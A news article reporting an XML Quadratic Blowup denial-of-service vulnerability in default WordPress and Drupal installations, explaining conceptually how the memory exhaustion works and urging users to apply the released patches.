A security researcher Nir Goldshlager, from Salesforce.com’s product security team, has discovered an XML vulnerability that impacts the popular website platforms WordPress and Drupal.
It uses a well-known XML Quadratic Blowup Attack — and when executed, it can take down an entire website or server almost instantly
The XML vulnerability Goldshlager discovered affects WordPress versions 3.5 to 3.9 (the current version) and works on the default installation. It affects Drupal versions 6.x to 7.x (the latest version) and also works on the default installation.
The good news is that both WordPress and Drupal have released patches for their applications. Users and web hosts simply need to upgrade to the latest version to protect against the vulnerability.
The vulnerability if exploited can basically render a website or web server unusable. The vulnerability can cause 100% CPU and RAM usage, cause the server to become unavailable and also create a Denial of Service attack on the MySQL database program.
How it works.
This vulnerability uses what is called an XML Quadratic Blowup Attack. This type of attack is similar to a Billion Laughs attack, which can allow a very small XML document to totally disrupt the services on machine in a matter of seconds.
The Quadratic Blowup Attack is similar; however, instead of using nested entities inside an XML document, it just repeats one large entity with tens of thousands of characters over and over again.
With this type of attack, an XML document that might be a few hundred kilobytes in size can end up requiring hundreds of megabytes or even gigabytes of memory. That will easily bring down an entire website or web server.
The default memory allocation limit for PHP (the language that WordPress and Drupal are written in) is 128MB per process. In theory, this means that you can’t exceed the 128MB limit with an XML bomb request. So far so good, right?
Here’s the problem: Apache, the world’s most popular web server, has its “Max Clients” property set to 256 by default. Meanwhile, MySQL, the database that WordPress and Drupal use, has its default “Max Connections” value set to 151.
If we multiply those connections against one another (128×151), we get 19328MB — which will consume all available memory.
To successfully attack the server, the attacker needs to fingerprint the available memory limit on the victim’s server. If the attack overwrites the PHP limit, the server will reject the overwrite, rendering the attack unsuccessful.
A successful attack, however, will return the injected payload as a result. This will bring down the system.
WordPress and Drupal have both updated their software to protect against this vulnerability. The update procedure will vary based on your setup.